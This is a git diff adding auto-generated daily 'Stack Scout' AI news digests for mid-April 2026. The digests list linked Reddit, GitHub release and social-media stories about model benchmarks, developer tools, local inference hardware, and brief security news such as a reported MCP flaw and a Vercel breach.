[P]](https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/) +*Reddit r/MachineLearning* | 16/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting. **The repo is fully open-source -- run it yourself on any model with an API:** [https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval) **The headline finding + +--- + +## [Keycard – inject API keys into subprocesses, never touch shell env](https://www.keycard.studio/) +*Hacker News* | 16/04/2026 | Score: 0.97 +Tags: api_update, cli_tool + +--- + +## [I turned my MacBook notch into a live Claude Code dashboard](https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/) +*Reddit r/ClaudeAI* | 16/04/2026 | Score: 0.91 +Tags: api_update, cli_tool + +> Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows: * Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses. * Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with "always allow" writing to \~/.claude/settings.json. * Every live session at a glance — project, model, uptime + +--- + +## [OpenClaw v2026.4.15 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.15) +*GitHub Releases · OpenClaw* | 16/04/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ### Changes - Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7. 
- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth. ### Fixes - Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills. + +--- + +## [Crush v0.59.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.59.0) +*GitHub Releases · Crush* | 16/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ## Changelog ### New! * 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm) * b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh) * e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering) ### Fixed * f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm + +--- + +## [Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?](https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: api_update + +> Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself. It’s ok on basic apps, but really struggles to move ahead on something more complex like + +--- + +## [PSA: Qwen3.6 ships with preserve_thinking. 
Make sure you have it on.](https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: tool_update + +> I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful. Qwen 3.6 now addresses this with a new preserve\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B) >`please use "preserve_thinking": True instead of "chat_template_kwargs": {"preserve_thinking + +--- + +## [Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.](https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: open_source + +> Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this Google if you seeing this (prob. not) please open source it in I/O 2026 Edit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it + +--- + +## [Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings](https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: agent_tool + +> Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text. The idea: every AI agent today generates human text, parses it, then executes it. 
That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins + +--- + diff --git a/data/digest-2026-04-17.md b/data/digest-2026-04-17.md new file mode 100644 index 0000000..b4320b3 --- /dev/null +++ b/data/digest-2026-04-17.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-17** | 15 stories | Auto-generated from 370 archived stories + +--- + +## [Crush v0.60.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.60.0) +*GitHub Releases · Crush* | 17/04/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> # Secret release You're not supposed to read through the changelog below. ## Changelog ### New! * ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering) ---
Verifying the artifacts First, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/ + +--- + +## [Adapt: open-source memory that rewrites its own structure when your data surprises it](https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. Works with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. Observe and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s + +--- + +## [Anthropic's AI protocol has critical flaw affecting 200,000 servers](https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/) +*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/ Security researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. 
The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more + +--- + +## [OpenAI Codex Just Got Its Biggest Update Yet](https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/) +*Reddit r/ChatGPT* | 17/04/2026 | Score: 1.00 +Tags: developer_tool, cli_tool, agent_tool + +> OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. Recent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. April 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and + +--- + +## [[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client](https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork. Web Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/) **MooshieUI Integration (Open Source)** For those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, + +--- + +## [How to Implement Karpathy's LLM Knowledge Base. 
Full Guide](https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/) +*Reddit r/ChatGPT* | 17/04/2026 | Score: 0.98 +Tags: api_update, developer_tool + +> karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup. **the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes + +--- + +## [Gemini CLI v0.38.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2) +*GitHub Releases · Gemini CLI* | 17/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2 + +--- + +## [Vercel CLI vercel@51.7.0 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0) +*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 +Tags: api_update, cli_tool + +> ### Minor Changes - [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895)) - Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893)) - [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920)) ### Patch Changes - Include `action` and `resource` fields from API 403 responses in non- + +--- + +## [Vercel CLI vercel@51.6.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1) 
+*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ### Patch Changes - Updated dependencies \[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]: - @vercel/build-utils@13.18.0 - @vercel/backends@0.1.0 - @vercel/python@6.34.0 - @vercel/elysia@0.1.68 - @vercel/express@0.1.78 - @vercel/fastify@0.1.71 - @vercel/go@3.5.0 - @vercel/h3@0.1.77 - @vercel/hono@0.2.71 - @vercel/hydrogen@1.3.6 - @vercel/koa@0.1.51 + +--- + +## [CadQuery is an open-source Python library for building 3D CAD models](https://cadquery.github.io/) +*Hacker News* | 15/04/2026 | Score: 0.84 +Tags: open_source, developer_tool + +--- + +## [Qwen3.6 GGUF is so good for debugging.](https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\_0 kv cache (context window) + +--- + +## [Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review](https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: open_source + +> The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70. + +--- + +## [Trying to Run LTX2.3 locally but getting an error](https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. 
I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h + +--- + +## [Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time](https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/) +*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 +Tags: tool_update + +> I genuinely cannot believe what I'm watching unfold today Anthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it And the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal + +--- + +## [Fastest image to image model](https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more. 
+ +--- + diff --git a/data/digest-2026-04-18.md b/data/digest-2026-04-18.md new file mode 100644 index 0000000..9c2b33f --- /dev/null +++ b/data/digest-2026-04-18.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-18** | 15 stories | Auto-generated from 256 archived stories + +--- + +## [[Update] GHOST v2.1: Full Native Windows Support is Live.](https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> FOR THE UNINITIATED: GHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required. KEY FEATURES Full Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer. Auto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture + +--- + +## [easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]](https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d I have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use. Having worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. 
For o + +--- + +## [We’re proud to open-source LIDARLearn [R] [D] [P]](https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support. It brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods. You can run everything from a single YAML file with one simple command. One of the best features: after training, you can automatically generate a publica + +--- + +## [Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra](https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix **Hardware:** Apple M3 Ultra, 256GB unified memory **Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK **Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B # The Agent Compatibility Matrix This is the part I wish + +--- + +## [gpt can now control your entire computer like a humain](https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/) +*Reddit r/ChatGPT* | 18/04/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> Hey everyone, I built something called AriaOS and just open-sourced it. The idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. 
It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment. What made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local + +--- + +## [ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.](https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/) +*Reddit r/ChatGPT* | 18/04/2026 | Score: 0.94 +Tags: mcp, open_source + +> You've probably asked ChatGPT a question about a game you're playing -- "is this item worth keeping in D2R," "why is my Factorio base bottlenecked," "how does this card interaction work in Magic," -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense. I built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess. For example: * * + +--- + +## [Goose v1.31.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.0) +*GitHub Releases · Goose* | 17/04/2026 | Score: 0.76 +Tags: github_release, tool_update + +> New version of Goose available. + +--- + +## [Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!](https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: api_update + +> Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users. 
Here's my docker compose file: services: vllm: image: vllm/vllm-openai:latest container_name: vllm deploy: resources: reservations: devices: - driver: nvidia count: all capabilities: [gpu] environment: - VLLM_API_KEY + +--- + +## [Are you guys actually using local tool calling or is it a collective prank?](https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: cli_tool + +> I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol Qwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works. Today with Gemma4, it kept assuring me it cr + +--- + +## [Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration](https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Quick update on Lore, the local-first memory app I posted here around v0.1.0. It's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine. v0.2.0 highlights: \- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls in real time. \- Embedding-model migration is now non-destructive. 
You can swap from nomic-embed to mxbai-embed (or whatever) without losing data; the new embeddingTableSync rebuilds in place + +--- + +## [EditAnything IC-LoRA - LTX-2.3](https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/) +*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 +Tags: tool_update + +> This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints. The current goal is not final polished production quality, but to explore: * edit-anything behavior * prompt-following * inference tradeoffs * synthetic dataset building, especially for **style data** The model was trained around four mai + +--- + +## [Melodic Brotherhood - I Just Need to Know (video generated with open source tools)](https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/) +*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing). Only non-open source thing is the music, which is Suno. + +--- + +## [Has PP improved enough on m5 max to go for 128gb?](https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: agent_tool + +> Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models. Thinking of upgrading to m5 max, just wondering what the sweet spot is for ram? 
Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding? + +--- + +## [Built a program to track logistical intelligence using satellite data [P]](https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: tool_update + +> Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts. But there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery. The trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart. Everything stationary looks nor + +--- + +## [Is there something like SETI for training open source models?](https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think. Would it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea? 
+ +--- + diff --git a/data/digest-2026-04-19.md b/data/digest-2026-04-19.md new file mode 100644 index 0000000..94cf540 --- /dev/null +++ b/data/digest-2026-04-19.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-04-19** | 15 stories | Auto-generated from 579 archived stories + +--- + +## [whats the best harness/app to use my llm with?](https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app looking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model. seeing things like hermes? cherry studio? good ol LM studio? + +--- + +## [I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality](https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> # Sum B+a+c+k+g+r+o+u+n+d: I've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. 
I set their dimne + +--- + +## [ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.](https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/) +*Reddit r/StableDiffusion* | 19/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference. Output images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA. Prompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl + +--- + +## [How would you describe the Midjourney look and why does it have one?](https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/) +*Reddit r/midjourney* | 19/04/2026 | Score: 0.78 +Tags: github_release, tool_update + +> I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. 
The con is that it’s very hard to use in any professional setting other + +--- + +## [I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design](https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/) +*Reddit r/ClaudeAI* | 19/04/2026 | Score: 0.78 +Tags: cli_tool, tool_update + +> Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry. So I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r + +--- + +## [Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents](https://x.com/BonairoFi/status/2045823726919258175) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale. + +--- + +## [Vercel Got Breached — Roll Your Secrets Right Now](https://x.com/vercel/status/2045865072074035664) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel. + +--- + +## [Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day](https://x.com/AmpereSh/status/2045866315496161601) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week. 
+ +--- + +## [Scoble Reshares Elon Musk's OpenClaw X API Endorsement](https://x.com/Scobleizer/status/2045572824866398399) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community. + +--- + +## [Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]](https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/) +*Reddit r/MachineLearning* | 19/04/2026 | Score: 1.00 +Tags: developer_tool + +> Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive. If the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a + +--- + +## [RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding](https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> TL;DR: If you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment? I’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB. 
My job is just needing to fine-tune with sma + +--- + +## [Acceptable prompt processing speed for you?](https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. For agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good? + +--- + +## [Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion](https://www.latent.space/p/notion) +*Latent Space* | Score: 0.98 +Tags: mcp + +--- + +## [Prepay for the Gemini API to get more control over your spend](https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/) +*Google AI Blog* | Score: 0.94 +Tags: api_update + +--- + +## [🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes](https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash) +*Rohan Paul* | Score: 0.90 +Tags: tool_update + +--- + diff --git a/data/digest-2026-04-20.md b/data/digest-2026-04-20.md new file mode 100644 index 0000000..41416ac --- /dev/null +++ b/data/digest-2026-04-20.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-20** | 15 stories | Auto-generated from 503 archived stories + +--- + +## [PowerShell v7.6.0 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0) +*GitHub Releases · PowerShell* | 18/03/2026 | Score: 0.70 +Tags: api_update, developer_tool, cli_tool + +> ## [7.6.0] - 2026-03-12 ### General Cmdlet Updates and Fixes - Update PowerShell Profile DSC resource manifests to allow 